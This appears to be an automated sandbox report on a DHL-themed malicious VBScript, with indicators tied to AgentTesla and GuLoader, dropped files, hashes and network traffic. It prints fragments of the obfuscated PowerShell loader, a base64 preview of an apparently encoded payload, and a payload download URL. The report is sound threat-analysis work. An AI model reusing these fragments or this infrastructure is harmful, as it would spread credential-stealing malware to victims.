                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:18
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:DHL_RF_20200712_BN_N0095673441.vbs
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winVBS@21/9@4/4
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 86%
                                      • Number of executed functions: 80
                                      • Number of non-executed functions: 15
                                      Cookbook Comments:
                                      • Found application associated with file extension: .vbs

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 72.21.81.240
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 4296 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7332 because it is empty
                                      • Execution Graph export aborted for target wab.exe, PID 7856 because it is empty
                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      08:03:44API Interceptor1x Sleep call for process: wscript.exe modified
                                      08:03:48API Interceptor122x Sleep call for process: powershell.exe modified
                                      08:04:47API Interceptor19852x Sleep call for process: wab.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      104.26.12.205Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                      • api.ipify.org/?format=json
                                      Sky-Beta.exeGet hashmaliciousStealitBrowse
                                      • api.ipify.org/?format=json
                                      SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                      • api.ipify.org/
                                      lods.cmdGet hashmaliciousRemcosBrowse
                                      • api.ipify.org/
                                      148.163.99.20https://protection.greathorn.com/services/v2/lookupUrl/7e3bdf99-9507-4ead-9b42-fc01b229af00/1555/152cd2a95486b37819b78fd941c410bf4167578b?domain=api-01.moengage.com&path=/v1/emailclickGet hashmaliciousUnknownBrowse
                                        Invoice.docxGet hashmaliciousGuLoaderBrowse
                                          https://drive.google.com/uc?export=download&id=1aOyH95HX89YKEUl_dVYIOHCqV8SBm6HLGet hashmaliciousUnknownBrowse
                                            192.185.13.234draft bl_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • concaribe.com/wp-includes/assets/GkRyQpLAQhPD144.bin

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            concaribe.comdraft bl_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 192.185.13.234
                                            api.ipify.orgTRANSPORT_INSTRUCTION_MR.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.26.13.205
                                            gmb.xlsGet hashmaliciousUnknownBrowse
                                            • 104.26.12.205
                                            Swift_Message#1234323456.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 172.67.74.152
                                            QUOTE RNP002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.74.152
                                            https://florideskser.online/loginGet hashmaliciousUnknownBrowse
                                            • 172.67.74.152
                                            CE1KVxYp5t.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                            • 172.67.74.152
                                            Ve6VeFSgkz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                            • 104.26.13.205
                                            z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.13.205
                                            https://www.wsj.pm/download.phpGet hashmaliciousNetSupport RATBrowse
                                            • 104.26.12.205
                                            doc.exeGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.74.152

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUSTRANSPORT_INSTRUCTION_MR.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.26.13.205
                                            New order-Docs0374.xlsGet hashmaliciousUnknownBrowse
                                            • 172.67.180.182
                                            gmb.xlsGet hashmaliciousUnknownBrowse
                                            • 172.67.180.182
                                            BNP Paribas_RemittanceAdviceNotification106173036326.docGet hashmaliciousAgentTeslaBrowse
                                            • 104.21.25.202
                                            Swift_Message#1234323456.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 172.67.74.152
                                            72625413524.vbsGet hashmaliciousXWormBrowse
                                            • 172.67.215.45
                                            Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.215.45
                                            ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docGet hashmaliciousSnake KeyloggerBrowse
                                            • 172.67.134.136
                                            https://universewild.orgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                            • 104.17.2.184
                                            https://url.avanan.click/v2/___https:/novafr-my.sharepoint.com/:b:/g/personal/mfranco_nova-fr_org/EZPaIwPkDApNno6rWIAO20YB4ByiRCAe_VGScx-2iiONBw?e=magUuY/___.YXAzOmVuLW1kYTphOm86ZDA4MDI5MGVhZTA1MzJiMWZlYTg0YjE1OWE2NmVhNjc6NjplYTNkOjc2NzNkYWE0NTMzNWVhMjkxM2VjMGU1NGMyNDY3ZjVhNmJhNjU0MTk1ZmRjMzUzM2QxODAyNDVjY2E1Y2M1ODY6aDpUGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.2.184
                                            UNIFIEDLAYER-AS-1USCR-FEDEX_TN-775537409198_Doc.vbsGet hashmaliciousUnknownBrowse
                                            • 192.185.84.89
                                            http://vgjlx.app.link/e/0ZWlI0Ci1IbGet hashmaliciousUnknownBrowse
                                            • 162.241.225.18
                                            QUOTE RNP002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 192.185.35.67
                                            https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=remoinmobiliaria.com%2F%40%2FAmericanautoshield/ZwgXU85423ZwgXU85423ZwgXU/bWlrZS5ub3ZpY2tAYW1lcmljYW5hdXRvc2hpZWxkLmNvbQ==Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                            • 108.179.194.39
                                            https://www.bing.com/ck/a?!&&p=b0f77ec767d44bfbJmltdHM9MTcxMjM2MTYwMCZpZ3VpZD0wMDc1OTQ1YS0xZDU3LTYxMDMtMzczZi04MDAzMWMwMTYwODImaW5zaWQ9NTE0MQ&ptn=3&ver=2&hsh=3&fclid=0075945a-1d57-6103-373f-80031c016082&u=a1aHR0cDovL3d3dy5kZXBhbmVsaW5nLmNvbS9wcm9kdWN0cy5odG1s&ntb=1Get hashmaliciousPhisherBrowse
                                            • 162.144.150.146
                                            INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                            • 162.240.81.18
                                            Order B2024-0000548 pdf.wsfGet hashmaliciousUnknownBrowse
                                            • 192.185.84.89
                                            https://www.sigtn.com/utils/emt.cfm?client_id=9195153&campaign_id=73466&link=aHR0cHM6Ly9icm9kbWFuc2dkdG5wZ2VzZWMuY29tL0NrMTgwZG5RbkFPVmZJM0V3ZTZEUDdTWTBYR201dXR4TlhOMkVrTHZBUTFmVUZ2a0tOL2hvd2FyZC5zdGV5bkBsY2F0dGVydG9uLmNvbS9jTGJ2cUtyZ1l5d3dpMkpOM0NGYXdrdW5kSFp4amJBQ2R0RkhneHNSGet hashmaliciousHTMLPhisherBrowse
                                            • 192.232.222.161
                                            https://u43957641.ct.sendgrid.net/ls/click?upn=u001.0Q2k6Tkbkoom04JcBCS1bm-2FvOge1W36GwvuSdih0P4JugvzV4-2FrWyPqZWCP-2FjIBNLIQsDH-2BiJ-2FwtGIsQEo-2F1lg-3D-3DD4vy_FXZTG-2Bj8dxNvEuxDJrPqKA8uB9LHQ48OflWnDl8SlkMIeqE5kJRv-2BwjlJ-2BTz9LaXXbddhQoxXZFjW61L1BulkplVPhKO5ARKFw4WBNXwUjDYnN9WjvMC1qZal-2BSbiVhkNDXHzo0-2BRl2juwpMn3h9dNAq9ZBCf8LnPEOZY9GqbZetUAeU7Eutkrra6RqLG0LYTAB9pnUknxEinL3j6RW-2F5AawLVk6-2FJEsz0F-2FhvPx4oc-3DGet hashmaliciousHTMLPhisherBrowse
                                            • 192.185.164.49
                                            CAHKHCM2404009CFS.exeGet hashmaliciousAgentTeslaBrowse
                                            • 192.185.129.60
                                            IOFLOODUSjNeaezBuo8.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                            • 107.167.96.30
                                            74fa486WVX.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                            • 107.167.96.30
                                            jhwTchfZRO.exeGet hashmaliciousUnknownBrowse
                                            • 107.167.96.30
                                            xgxLxAfjCG.elfGet hashmaliciousMiraiBrowse
                                            • 107.189.162.242
                                            e8iuAWz9pB.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                            • 107.167.96.30
                                            winrar-x64-620b2.exeGet hashmaliciousUnknownBrowse
                                            • 107.167.96.30
                                            g2nXBEjfVF.exeGet hashmaliciousGlupteba, Mars Stealer, Stealc, VidarBrowse
                                            • 107.167.96.31
                                            SecuriteInfo.com.Win64.Evo-gen.247.3191.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                            • 107.167.96.30
                                            file.exeGet hashmaliciousGlupteba, Mars Stealer, VidarBrowse
                                            • 107.167.96.30
                                            jl4cNPbc3h.exeGet hashmaliciousLummaC, Amadey, Glupteba, Mars Stealer, PureLog Stealer, RHADAMANTHYS, RedLineBrowse
                                            • 107.167.96.30

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0ee-dekont_swift-details.vbsGet hashmaliciousUnknownBrowse
                                            • 104.26.12.205
                                            TRANSPORT_INSTRUCTION_MR.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.26.12.205
                                            Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.26.12.205
                                            shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 104.26.12.205
                                            copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 104.26.12.205
                                            Swift_Message#1234323456.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.26.12.205
                                            72625413524.vbsGet hashmaliciousXWormBrowse
                                            • 104.26.12.205
                                            Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.12.205
                                            Shipping Document_PDF.vbsGet hashmaliciousUnknownBrowse
                                            • 104.26.12.205
                                            BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                            • 104.26.12.205

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                            Download File
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                            Category:dropped
                                            Size (bytes):69993
                                            Entropy (8bit):7.99584879649948
                                            Encrypted:true
                                            SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                            MD5:29F65BA8E88C063813CC50A4EA544E93
                                            SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                            SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                            SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                            Malicious:false
                                            Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                            Download File
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):330
                                            Entropy (8bit):3.133342626074861
                                            Encrypted:false
                                            SSDEEP:6:kKDKE/lDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:B/lMkPlE99SNxAhUeVLVt
                                            MD5:5F4B45B1E216FF91DC7EC943A4440D0A
                                            SHA1:C9D1F7F3CAE3CCD95925CD17361B5983BF77BD1A
                                            SHA-256:EB241CD49E39738A689817435EB91BC2113CB8D8F926FB833352017C8D1A1348
                                            SHA-512:5FA8EBCEFD2C7D30557DA3BB0CF05AF9CA2DF007F2496087FB4E3D9DD7DE9D49E02088179B901BB0CAA8C08A297697BF1B2439B3C839BA4881F9782B22172366
                                            Malicious:false
                                            Preview:p...... ........./..C...(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):11608
                                            Entropy (8bit):4.886255615007755
                                            Encrypted:false
                                            SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                            MD5:C7F7A26360E678A83AFAB85054B538EA
                                            SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                            SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                            SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                            Malicious:false
                                            Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:Nlllulbnolz:NllUc
                                            MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                            SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                            SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                            SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                            Malicious:false
                                            Preview:@...e................................................@..........

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_baqxzscp.zid.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fteeovzp.5pn.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrsca1lt.bks.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yp5pqg1d.kqs.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Roaming\Luminescences.ska

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):443804
                                            Entropy (8bit):5.972321806529179
                                            Encrypted:false
                                            SSDEEP:6144:h1oLqJ1qTAgexDYDyTvM0deeDquY4av2Bsv5wq1JzeUAdv+HIqyzb:T8qJgAowRhDdY4avJZJzeJWG
                                            MD5:8C61DB82FF71EF703A4C25B6CBB38305
                                            SHA1:7CCC2E016F3B92244A256C38091C8C7C3B1474EC
                                            SHA-256:E92719FE422DF97AE3CECC5F7B177A7373C24DD9AF69F0B5279F498CC0C2A8CF
                                            SHA-512:9632E3EEB7AAA2347B7A755483D4A87969A1FDA208E64A5D2CBF96D5E9524C64D8987194638A1A822A8B6AE3B05AB70C3097886FE1E3086C5B2A1B9101B78256
                                            Malicious:false
                                            Preview:6wK7MOsClZC76j8MAHEBm3EBmwNcJATrAtl/cQGbuRup0sFxAZtxAZuB8Z0S5ZrrAsZl6wJLEoHphrs3W+sCj5TrAo6/6wLIpOsCsci6TfrABusCqJLrAnue6wJQKOsCqAUxynEBm3EBm4kUC+sCtNrrAg5E0eJxAZvrAg74g8EE6wJBXXEBm4H51oLqBHzKcQGbcQGbi0QkBOsCnRvrAuiNicNxAZvrAu7lgcNg9XAAcQGbcQGbuqW9eTBxAZtxAZuB8uMpamLrAvyfcQGbgfJGlBNS6wJu3+sC1E3rAikdcQGb6wKXO+sCUbaLDBBxAZvrAvz5iQwT6wIt6HEBm0LrAh57cQGbgfqwogQAddTrAgCUcQGbiVwkDHEBm+sCdraB7QADAADrAp41cQGbi1QkCOsC/obrAu0Ii3wkBHEBm3EBm4nr6wLaXOsCQV+Bw5wAAADrAhkrcQGbU3EBm3EBm2pAcQGb6wL5D4nrcQGbcQGbx4MAAQAAAND5BOsCkixxAZuBwwABAADrAujs6wLUSVPrAnSUcQGbietxAZvrAq7EibsEAQAAcQGbcQGbgcMEAQAA6wI+n+sC+T9T6wKEResCGrBq/3EBm+sCLyaDwgVxAZvrAnK+MfZxAZtxAZsxyXEBm+sCBBmLGnEBm+sCLlxBcQGb6wLQTjkcCnXzcQGb6wLR00brAsMn6wIIQ4B8Cvu4ddzrAupGcQGbi0QK/HEBm3EBmynwcQGb6wJwBf/S6wIN8XEBm7qwogQA6wIBt+sCqpkxwOsCaHzrAu7Fi3wkDHEBm3EBm4E0BxV+T+zrAnl+6wK6RoPABOsC9lRxAZs50HXj6wLlQXEBm4n7cQGbcQGb/9dxAZvrAtA4c0eEZfD3Cg6tBqpBD1OYd/2uSnPTzNPp1YzI9Ty6xKn3+oW5nJt3A6xQWeWzR41t5CNSMYT/vvdqvI2KkK/OHWUKWRnjvA4rUXNP+jz7rIqQrc6YGH5k1xe4zpgY

                                            Static File Info

                                            General

                                            File type:ASCII text, with very long lines (604), with CRLF line terminators
                                            Entropy (8bit):5.34769190766317
                                            TrID:
                                              File name:DHL_RF_20200712_BN_N0095673441.vbs
                                              File size:59'875 bytes
                                              MD5:3ed2e1ab2cf97a15766d46588a8e1470
                                              SHA1:9e162dfd21865fce19f4dbd061e6d97ebcb39cf5
                                              SHA256:297ec7d2a4002e4b4dc52186f528e0853c231a110fc28b14c909db702c25ae7e
                                              SHA512:de9e53bddaee5723f9ee165a7192eae3aacc5bd6b2290de9627d9d57ed8a5c397308644083db49c7b217b2cbb253bd1edb93cca6332ad7ff21c92df22c6d4ce5
                                              SSDEEP:1536:A5ZukLI1gPDPTxyk0MfFCNqn3JV2P7jX+9ULT:A5Zukk1gPDJzoGZ8P3kS
                                              TLSH:EF43B4AFCF0726080F8A1FD69864CD5586B711B2F1042439B5EDE7E9A183EAC81F8D5D
                                              File Content Preview:.. ..Fl7 = Fl7 + "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';gronchiction Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forret

                                              File Icon

                                              Icon Hash:68d69b8f86ab9a86

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 23, 2024 08:03:50.613231897 CEST4973180192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:03:50.761374950 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:50.761535883 CEST4973180192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:03:50.761883020 CEST4973180192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:03:50.909811020 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:50.909863949 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:50.909949064 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:50.909996033 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:50.910015106 CEST4973180192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:03:50.910092115 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:50.910185099 CEST4973180192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:03:50.910195112 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:50.910243988 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:50.910275936 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:50.910290003 CEST4973180192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:03:50.910339117 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:50.910393953 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:50.910417080 CEST4973180192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:03:50.910437107 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:50.910486937 CEST4973180192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:03:51.057887077 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:51.057909966 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:51.057962894 CEST4973180192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:03:51.058027029 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:51.058046103 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:51.058058023 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:51.058069944 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:51.058083057 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:51.058095932 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:51.058104992 CEST4973180192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:03:51.058109045 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:51.058136940 CEST4973180192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:03:51.058155060 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:51.058167934 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:51.058193922 CEST8049731148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:03:51.058197975 CEST4973180192.168.2.4148.163.99.20
